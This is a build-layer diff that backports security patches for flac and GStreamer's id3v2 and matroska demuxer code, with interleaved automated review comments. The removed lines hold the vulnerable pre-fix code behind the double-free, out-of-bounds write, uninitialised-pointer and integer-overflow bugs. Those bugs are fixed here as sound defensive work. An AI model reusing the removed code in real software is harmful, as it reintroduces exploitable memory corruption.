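++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ if(size1 > SIZE_MAX / size2)
++ return 0;
++ return realloc(ptr, size1*size2);
++}
++
+ /* size1 * (size2 + size3) */
+ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+@@ -216,4 +238,15 @@ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2,
+ return safe_realloc_mul_2op_(ptr, size1, size2);
+ }
+
++/* size1 * (size2 + size3) */
++static inline void *safe_realloc_nofree_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
++{
++ if(!size1 || (!size2 && !size3))
++ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
++ size2 += size3;
++ if(size2 < size3)
++ return 0;
++ return safe_realloc_nofree_mul_2op_(ptr, size1, size2);
++}
++
+ #endif
+diff --git a/src/flac/encode.c b/src/flac/encode.c
+index a9b907f..f87250c 100644
+--- a/src/flac/encode.c
++++ b/src/flac/encode.c
+@@ -1743,10 +1743,10 @@ static void static_metadata_clear(static_metadata_t *m)
+ static FLAC__bool static_metadata_append(static_metadata_t *m, FLAC__StreamMetadata *d, FLAC__bool needs_delete)
+ {
+ void *x;
+- if(0 == (x = safe_realloc_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+ return false;
+ m->metadata = (FLAC__StreamMetadata**)x;
+- if(0 == (x = safe_realloc_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
++ if(0 == (x = safe_realloc_nofree_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
+ return false;
+ m->needs_delete = (FLAC__bool*)x;
+ m->metadata[m->num_metadata] = d;
+diff --git a/src/flac/foreign_metadata.c b/src/flac/foreign_metadata.c
+index 9ad9c18..fdfb3cf 100644
+--- a/src/flac/foreign_metadata.c
++++ b/src/flac/foreign_metadata.c
+@@ -75,7 +75,7 @@ static FLAC__bool copy_data_(FILE *fin, FILE *fout, size_t size, const char **er
+
+ static FLAC__bool append_block_(foreign_metadata_t *fm, FLAC__off_t offset, FLAC__uint32 size, const char **error)
+ {
+- foreign_block_t *fb = safe_realloc_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
++ foreign_block_t *fb = safe_realloc_nofree_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
+ if(fb) {
+ fb[fm->num_blocks].offset = offset;
+ fb[fm->num_blocks].size = size;
+diff --git a/src/libFLAC/bitwriter.c b/src/libFLAC/bitwriter.c
+index 6e86585..a510b0d 100644
+--- a/src/libFLAC/bitwriter.c
++++ b/src/libFLAC/bitwriter.c
+@@ -124,7 +124,7 @@ FLAC__bool bitwriter_grow_(FLAC__BitWriter *bw, uint32_t bits_to_add)
+ FLAC__ASSERT(new_capacity > bw->capacity);
+ FLAC__ASSERT(new_capacity >= bw->words + ((bw->bits + bits_to_add + FLAC__BITS_PER_WORD - 1) / FLAC__BITS_PER_WORD));
+
+- new_buffer = safe_realloc_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
++ new_buffer = safe_realloc_nofree_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
+ if(new_buffer == 0)
+ return false;
+ bw->buffer = new_buffer;
+diff --git a/src/libFLAC/metadata_object.c b/src/libFLAC/metadata_object.c
+index de8e513..aef65be 100644
+--- a/src/libFLAC/metadata_object.c
++++ b/src/libFLAC/metadata_object.c
+@@ -98,7 +98,7 @@ static FLAC__bool free_copy_bytes_(FLAC__byte **to, const FLAC__byte *from, uint
+ /* realloc() failure leaves entry unchanged */
+ static FLAC__bool ensure_null_terminated_(FLAC__byte **entry, uint32_t length)
+ {
+- FLAC__byte *x = safe_realloc_add_2op_(*entry, length, /*+*/1);
++ FLAC__byte *x = safe_realloc_nofree_add_2op_(*entry, length, /*+*/1);
+ if (x != NULL) {
+ x[length] = '\0';
+ *entry = x;
+diff --git a/src/plugin_common/tags.c b/src/plugin_common/tags.c
+index ae440c5..dfa10d3 100644
+--- a/src/plugin_common/tags.c
++++ b/src/plugin_common/tags.c
+@@ -317,7 +317,7 @@ FLAC__bool FLAC_plugin__tags_add_tag_utf8(FLAC__StreamMetadata *tags, const char
+ const size_t value_len = strlen(value);
+ const size_t separator_len = strlen(separator);
+ FLAC__byte *new_entry;
+- if(0 == (new_entry = safe_realloc_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
++ if(0 == (new_entry = safe_realloc_nofree_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
+ return false;
+ memcpy(new_entry+entry->length, separator, separator_len);
+ entry->length += separator_len;
+diff --git a/src/share/utf8/iconvert.c b/src/share/utf8/iconvert.c
+index 8ab53c1..876c06e 100644
+--- a/src/share/utf8/iconvert.c
++++ b/src/share/utf8/iconvert.c
+@@ -149,7 +149,7 @@ int iconvert(const char *fromcode, const char *tocode,
+ iconv_close(cd1);
+ return ret;
+ }
+- newbuf = safe_realloc_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
++ newbuf = safe_realloc_nofree_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
+ if (!newbuf)
+ goto fail;
+ ob = (ob - utfbuf) + newbuf;
+--
+2.40.0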
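Review bot: The new `safe_realloc_nofree_mul_2op_` and `safe_realloc_nofree_muladd2_` helpers return `realloc(ptr, 0)` when a size is zero, and on common C libraries that call frees `ptr` and returns NULL. A caller written in the pattern this patch is built around, `if (0 == (x = ...(y, ...))) return false`, would then still hold `y` and free it later, which is the double free the `_nofree` variants are meant to rule out. The call sites visible in this patch appear to pass non-zero sizes (a `sizeof` times a count plus one, or an asserted larger capacity), so the branch looks unreachable today. A comment on both helpers such as `/* a zero size may free ptr: callers must never pass 0 */` would keep that assumption explicit for later callers.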
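--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
@@ -0,0 +1,34 @@
+From e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be Mon Sep 17 00:00:00 2001
+From: Neelkamal Semwal <neelkamal.semwal@ittiam.com>
+Date: Fri, 18 Dec 2020 22:28:36 +0530
+Subject: [PATCH] libFlac: Exit at EOS in verify mode
+
+When verify mode is enabled, once decoder flags end of stream,
+encode processing is considered complete.
+
+CVE-2021-0561
+
+Signed-off-by: Ralph Giles <giles@thaumas.net>
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be]
+CVE: CVE-2021-0561
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/libFLAC/stream_encoder.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/libFLAC/stream_encoder.c b/src/libFLAC/stream_encoder.c
+index 4c91247fe8..7109802c27 100644
+--- a/src/libFLAC/stream_encoder.c
++++ b/src/libFLAC/stream_encoder.c
+@@ -2610,7 +2610,9 @@ FLAC__bool write_bitbuffer_(FLAC__StreamEncoder *encoder, uint32_t samples, FLAC
+ encoder->private_->verify.needs_magic_hack = true;
+ }
+ else {
+- if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)) {
++ if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)
++ || (!is_last_block
++ && (FLAC__stream_encoder_get_verify_decoder_state(encoder) == FLAC__STREAM_DECODER_END_OF_STREAM))) {
+ FLAC__bitwriter_release_buffer(encoder->private_->frame);
+ FLAC__bitwriter_clear(encoder->private_->frame);
+ if(encoder->protected_->state != FLAC__STREAM_ENCODER_VERIFY_MISMATCH_IN_AUDIO_DATA)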
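diff --git a/meta/recipes-multimedia/flac/flac_1.3.3.bb b/meta/recipes-multimedia/flac/flac_1.3.3.bb
index cb6692aedf..e593727ac8 100644
--- a/meta/recipes-multimedia/flac/flac_1.3.3.bb
+++ b/meta/recipes-multimedia/flac/flac_1.3.3.bb
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING.FDL;md5=ad1419ecc56e060eccf8184a87c4285f \
 DEPENDS = "libogg"
 
 SRC_URI = "http://downloads.xiph.org/releases/flac/${BP}.tar.xz \
+ file://CVE-2020-22219.patch \
+ file://CVE-2021-0561.patch \
 "
 
 SRC_URI[md5sum] = "26703ed2858c1fc9ffc05136d13daa69"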
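diff --git a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
index cc7a7e78e2..6494013e3f 100644
--- a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
+++ b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
@@ -1,10 +1,13 @@
 SUMMARY = "GStreamer examples (including gtk-play, gst-play)"
+DESCRIPTION = "GStreamer example applications"
+HOMEPAGE = "https://gitlab.freedesktop.org/gstreamer/gst-examples"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-examples/-/issues"
 LICENSE = "LGPL-2.0+"
 LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20;md5=f8c72dae3d36823ec716a9ebcae593b9"
 
 DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native"
 
-SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \
  file://0001-Make-player-examples-installable.patch \
  file://gst-player.desktop \
  "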
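diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
index 98355a1b75..a8ad777422 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Libav-based GStreamer 1.x plugin"
+DESCRIPTION = "Contains a GStreamer plugin for using the encoders, decoders, \
+muxers, and demuxers provided by FFmpeg."
 HOMEPAGE = "http://gstreamer.freedesktop.org/"
 SECTION = "multimedia"
 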
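diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
index 1aa13cf73c..46653e2392 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
@@ -1,4 +1,5 @@
 SUMMARY = "OpenMAX IL plugins for GStreamer"
+DESCRIPTION = "Wraps available OpenMAX IL components and makes them available as standard GStreamer elements."
 HOMEPAGE = "http://gstreamer.freedesktop.org/"
 SECTION = "multimedia"
 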
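diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
index ffbaaf425a..f741db2172 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
@@ -1,5 +1,9 @@
 require gstreamer1.0-plugins-common.inc
 
+DESCRIPTION = "'Bad' GStreamer plugins and helper libraries "
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-bad/-/issues"
+
 SRC_URI = " \
  https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-${PV}.tar.xz \
  file://0001-meson-build-gir-even-when-cross-compiling-if-introsp.patch \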
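diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
new file mode 100644
index 0000000000..3717f0cf3a
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
@@ -0,0 +1,36 @@
+From 067e759136904b82bba9c6d1d781c4408dfecfe6 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Tim-Philipp=20M=C3=BCller?= <tim@centricular.com>
+Date: Wed, 3 Mar 2021 01:08:25 +0000
+Subject: [PATCH] tag: id3v2: fix frame size check and potential invalid reads
+
+Check the right variable when checking if there's
+enough data left to read the frame size.
+
+Closes https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues/876
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/merge_requests/1066>
+
+Upstream-Status: Backport
+[https://gstreamer.freedesktop.org/security/sa-2021-0001.html]
+CVE: CVE-2021-3522
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ gst-libs/gst/tag/id3v2frames.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gst-libs/gst/tag/id3v2frames.c b/gst-libs/gst/tag/id3v2frames.c
+index 8e9f782..f39659b 100644
+--- a/gst-libs/gst/tag/id3v2frames.c
++++ b/gst-libs/gst/tag/id3v2frames.c
+@@ -109,7 +109,7 @@ id3v2_parse_frame (ID3TagsWorking * work)
+
+ if (work->frame_flags & (ID3V2_FRAME_FORMAT_COMPRESSION |
+ ID3V2_FRAME_FORMAT_DATA_LENGTH_INDICATOR)) {
+- if (work->hdr.frame_data_size <= 4)
++ if (frame_data_size <= 4)
+ return FALSE;
+ if (ID3V2_VER_MAJOR (work->hdr.version) == 3) {
+ work->parse_size = GST_READ_UINT32_BE (frame_data);
+--
+2.17.1
+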
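diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
index 9daaf7587e..bcfdef3bbd 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
@@ -1,5 +1,8 @@
 require gstreamer1.0-plugins-common.inc
 
+DESCRIPTION = "'Base' GStreamer plugins and helper libraries"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues"
 LICENSE = "GPLv2+ & LGPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=6762ed442b3822387a51c92d928ead0d \
  file://common/coverage/coverage-report.pl;beginline=2;endline=17;md5=a4e1830fce078028c8f0974161272607"
@@ -12,6 +15,7 @@ SRC_URI = " \
  file://0003-ssaparse-enhance-SSA-text-lines-parsing.patch \
  file://0005-viv-fb-Make-sure-config.h-is-included.patch \
  file://0009-glimagesink-Downrank-to-marginal.patch \
+ file://CVE-2021-3522.patch \
  "
 SRC_URI[md5sum] = "e3ddb1bae9fb510b49a295f212f1e6e4"
 SRC_URI[sha256sum] = "9f02678b0bbbcc9eff107d3bd89d83ce92fec2154cd607c7c8bd34dc7fee491c"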
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
new file mode 100644
index 0000000000..81f7c59a7b
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
@@ -0,0 +1,207 @@
1From 9181191511f9c0be6a89c98b311f49d66bd46dc3 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Thu, 4 Mar 2021 13:05:19 +0200
4Subject: [PATCH] matroskademux: Fix extraction of multichannel WavPack
5
6The old code had a couple of issues that all lead to potential memory
7safety bugs.
8
9 - Use a constant for the Wavpack4Header size instead of using sizeof.
10 It's written out into the data and not from the struct and who knows
11 what special alignment/padding requirements some C compilers have.
12 - gst_buffer_set_size() does not realloc the buffer when setting a
13 bigger size than allocated, it only allows growing up to the maximum
14 allocated size. Instead use a GstAdapter to collect all the blocks
15 and take out everything at once in the end.
16 - Check that enough data is actually available in the input and
17 otherwise handle it an error in all cases instead of silently
18 ignoring it.
19
20Among other things this fixes out of bounds writes because the code
21assumed gst_buffer_set_size() can grow the buffer and simply wrote after
22the end of the buffer.
23
24Thanks to Natalie Silvanovich for reporting.
25
26Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/859
27
28Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
29
30Upstream-Status: Backport
31https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/9181191511f9c0be6a89c98b311f49d66bd46dc3?merge_request_iid=903
32CVE: CVE-2021-3497
33Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
34
35---
36 gst/matroska/matroska-demux.c | 99 +++++++++++++++++++----------------
37 gst/matroska/matroska-ids.h | 2 +
38 2 files changed, 55 insertions(+), 46 deletions(-)
39
40diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
41index 467815986..0e47ee7b5 100644
42--- a/gst/matroska/matroska-demux.c
43+++ b/gst/matroska/matroska-demux.c
44@@ -3851,6 +3851,12 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
45 guint32 block_samples, tmp;
46 gsize size = gst_buffer_get_size (*buf);
47
48+ if (size < 4) {
49+ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
50+ gst_buffer_unmap (*buf, &map);
51+ return GST_FLOW_ERROR;
52+ }
53+
54 gst_buffer_extract (*buf, 0, &tmp, sizeof (guint32));
55 block_samples = GUINT32_FROM_LE (tmp);
56 /* we need to reconstruct the header of the wavpack block */
57@@ -3858,10 +3864,10 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
58 /* -20 because ck_size is the size of the wavpack block -8
59 * and lace_size is the size of the wavpack block + 12
60 * (the three guint32 of the header that already are in the buffer) */
61- wvh.ck_size = size + sizeof (Wavpack4Header) - 20;
62+ wvh.ck_size = size + WAVPACK4_HEADER_SIZE - 20;
63
64 /* block_samples, flags and crc are already in the buffer */
65- newbuf = gst_buffer_new_allocate (NULL, sizeof (Wavpack4Header) - 12, NULL);
66+ newbuf = gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE - 12, NULL);
67
68 gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
69 data = outmap.data;
70@@ -3886,9 +3892,11 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
71 audiocontext->wvpk_block_index += block_samples;
72 } else {
73 guint8 *outdata = NULL;
74- guint outpos = 0;
75- gsize buf_size, size, out_size = 0;
76+ gsize buf_size, size;
77 guint32 block_samples, flags, crc, blocksize;
78+ GstAdapter *adapter;
79+
80+ adapter = gst_adapter_new ();
81
82 gst_buffer_map (*buf, &map, GST_MAP_READ);
83 buf_data = map.data;
84@@ -3897,6 +3905,7 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
85 if (buf_size < 4) {
86 GST_ERROR_OBJECT (element, "Too small wavpack buffer");
87 gst_buffer_unmap (*buf, &map);
88+ g_object_unref (adapter);
89 return GST_FLOW_ERROR;
90 }
91
92@@ -3918,59 +3927,57 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
93 data += 4;
94 size -= 4;
95
96- if (blocksize == 0 || size < blocksize)
97- break;
98-
99- g_assert ((newbuf == NULL) == (outdata == NULL));
100+ if (blocksize == 0 || size < blocksize) {
101+ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
102+ gst_buffer_unmap (*buf, &map);
103+ g_object_unref (adapter);
104+ return GST_FLOW_ERROR;
105+ }
106
107- if (newbuf == NULL) {
108- out_size = sizeof (Wavpack4Header) + blocksize;
109- newbuf = gst_buffer_new_allocate (NULL, out_size, NULL);
110+ g_assert (newbuf == NULL);
111
112- gst_buffer_copy_into (newbuf, *buf,
113- GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
114+ newbuf =
115+ gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE + blocksize,
116+ NULL);
117+ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
118+ outdata = outmap.data;
119+
120+ outdata[0] = 'w';
121+ outdata[1] = 'v';
122+ outdata[2] = 'p';
123+ outdata[3] = 'k';
124+ outdata += 4;
125+
126+ GST_WRITE_UINT32_LE (outdata, blocksize + WAVPACK4_HEADER_SIZE - 8);
127+ GST_WRITE_UINT16_LE (outdata + 4, wvh.version);
128+ GST_WRITE_UINT8 (outdata + 6, wvh.track_no);
129+ GST_WRITE_UINT8 (outdata + 7, wvh.index_no);
130+ GST_WRITE_UINT32_LE (outdata + 8, wvh.total_samples);
131+ GST_WRITE_UINT32_LE (outdata + 12, wvh.block_index);
132+ GST_WRITE_UINT32_LE (outdata + 16, block_samples);
133+ GST_WRITE_UINT32_LE (outdata + 20, flags);
134+ GST_WRITE_UINT32_LE (outdata + 24, crc);
135+ outdata += 28;
136+
137+ memcpy (outdata, data, blocksize);
138
139- outpos = 0;
140- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
141- outdata = outmap.data;
142- } else {
143- gst_buffer_unmap (newbuf, &outmap);
144- out_size += sizeof (Wavpack4Header) + blocksize;
145- gst_buffer_set_size (newbuf, out_size);
146- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
147- outdata = outmap.data;
148- }
149+ gst_buffer_unmap (newbuf, &outmap);
150+ gst_adapter_push (adapter, newbuf);
151+ newbuf = NULL;
152
153- outdata[outpos] = 'w';
154- outdata[outpos + 1] = 'v';
155- outdata[outpos + 2] = 'p';
156- outdata[outpos + 3] = 'k';
157- outpos += 4;
158-
159- GST_WRITE_UINT32_LE (outdata + outpos,
160- blocksize + sizeof (Wavpack4Header) - 8);
161- GST_WRITE_UINT16_LE (outdata + outpos + 4, wvh.version);
162- GST_WRITE_UINT8 (outdata + outpos + 6, wvh.track_no);
163- GST_WRITE_UINT8 (outdata + outpos + 7, wvh.index_no);
164- GST_WRITE_UINT32_LE (outdata + outpos + 8, wvh.total_samples);
165- GST_WRITE_UINT32_LE (outdata + outpos + 12, wvh.block_index);
166- GST_WRITE_UINT32_LE (outdata + outpos + 16, block_samples);
167- GST_WRITE_UINT32_LE (outdata + outpos + 20, flags);
168- GST_WRITE_UINT32_LE (outdata + outpos + 24, crc);
169- outpos += 28;
170-
171- memmove (outdata + outpos, data, blocksize);
172- outpos += blocksize;
173 data += blocksize;
174 size -= blocksize;
175 }
176 gst_buffer_unmap (*buf, &map);
177- gst_buffer_unref (*buf);
178
179- if (newbuf)
180- gst_buffer_unmap (newbuf, &outmap);
181+ newbuf = gst_adapter_take_buffer (adapter, gst_adapter_available (adapter));
182+ g_object_unref (adapter);
183
184+ gst_buffer_copy_into (newbuf, *buf,
185+ GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
186+ gst_buffer_unref (*buf);
187 *buf = newbuf;
188+
189 audiocontext->wvpk_block_index += block_samples;
190 }
191
192diff --git a/gst/matroska/matroska-ids.h b/gst/matroska/matroska-ids.h
193index 429213f77..8d4a685a9 100644
194--- a/gst/matroska/matroska-ids.h
195+++ b/gst/matroska/matroska-ids.h
196@@ -688,6 +688,8 @@ typedef struct _Wavpack4Header {
197 guint32 crc; /* crc for actual decoded data */
198 } Wavpack4Header;
199
200+#define WAVPACK4_HEADER_SIZE (32)
201+
202 typedef enum {
203 GST_MATROSKA_TRACK_ENCODING_SCOPE_FRAME = (1<<0),
204 GST_MATROSKA_TRACK_ENCODING_SCOPE_CODEC_DATA = (1<<1),
205--
206GitLab
207
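Review bot: The new `size < 4` guard in the first hunk of gst_matroska_demux_add_wvpk_header calls `gst_buffer_unmap (*buf, &map)` although no `gst_buffer_map` of `*buf` is visible before it in that branch. The surrounding lines read the buffer with `gst_buffer_get_size` and `gst_buffer_extract`, and only the multichannel `else` branch maps it explicitly with `gst_buffer_map (*buf, &map, GST_MAP_READ)`. The function starts outside the hunk, so this needs confirming against the full source, but if `map` is indeed unmapped here the error path should be just `GST_ERROR_OBJECT (element, "Too small wavpack buffer");` followed by `return GST_FLOW_ERROR;`. It is worth checking whether upstream carries a follow-up fix for this path before the backport is merged.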
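diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
new file mode 100644
index 0000000000..d3de2d5014
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch
@@ -0,0 +1,44 @@
+From 02174790726dd20a5c73ce2002189bf240ad4fe0 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 3 Mar 2021 11:31:52 +0200
+Subject: [PATCH] matroskademux: Initialize track context out parameter to NULL
+ before parsing
+
+Various error return paths don't set it to NULL and callers are only
+checking if the pointer is NULL. As it's allocated on the stack this
+usually contains random stack memory, and more often than not the memory
+of a previously parsed track.
+
+This then causes all kinds of memory corruptions further down the line.
+
+Thanks to Natalie Silvanovich for reporting.
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/858
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
+
+Upstream-Status: Backport [
+https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/02174790726dd20a5c73ce2002189bf240ad4fe0?merge_request_iid=903 ]
+CVE: CVE-2021-3498
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gst/matroska/matroska-demux.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 4d0234743..467815986 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -692,6 +692,8 @@ gst_matroska_demux_parse_stream (GstMatroskaDemux * demux, GstEbmlRead * ebml,
+
+ DEBUG_ELEMENT_START (demux, ebml, "TrackEntry");
+
++ *dest_context = NULL;
++
+ /* start with the master */
+ if ((ret = gst_ebml_read_master (ebml, &id)) != GST_FLOW_OK) {
+ DEBUG_ELEMENT_STOP (demux, ebml, "TrackEntry", ret);
+--
+GitLab
+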
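diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
new file mode 100644
index 0000000000..ee33c5564d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch
@@ -0,0 +1,59 @@
+From cf887f1b8e228bff6e19829e6d03995d70ad739d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 10:23:15 +0300
+Subject: [PATCH] matroskademux: Avoid integer-overflow resulting in heap
+ corruption in WavPack header handling code
+
+blocksize + WAVPACK4_HEADER_SIZE might overflow gsize, which then
+results in allocating a very small buffer. Into that buffer blocksize
+data is memcpy'd later which then causes out of bound writes and can
+potentially lead to anything from crashes to remote code execution.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1920
+
+https://gstreamer.freedesktop.org/security/sa-2022-0004.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1226
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2612>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/0df0dd7fe388174e4835eda4526b47f470a56370
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-demux.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
+index 64cc6be60be..01d754c3eb9 100644
+--- a/gst/matroska/matroska-demux.c
++++ b/gst/matroska/matroska-demux.c
+@@ -3933,7 +3933,8 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ } else {
+ guint8 *outdata = NULL;
+ gsize buf_size, size;
+- guint32 block_samples, flags, crc, blocksize;
++ guint32 block_samples, flags, crc;
++ gsize blocksize;
+ GstAdapter *adapter;
+
+ adapter = gst_adapter_new ();
+@@ -3974,6 +3975,13 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
+ return GST_FLOW_ERROR;
+ }
+
++ if (blocksize > G_MAXSIZE - WAVPACK4_HEADER_SIZE) {
++ GST_ERROR_OBJECT (element, "Too big wavpack buffer");
++ gst_buffer_unmap (*buf, &map);
++ g_object_unref (adapter);
++ return GST_FLOW_ERROR;
++ }
++
+ g_assert (newbuf == NULL);
+
+ newbuf =
+--
+GitLab
+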
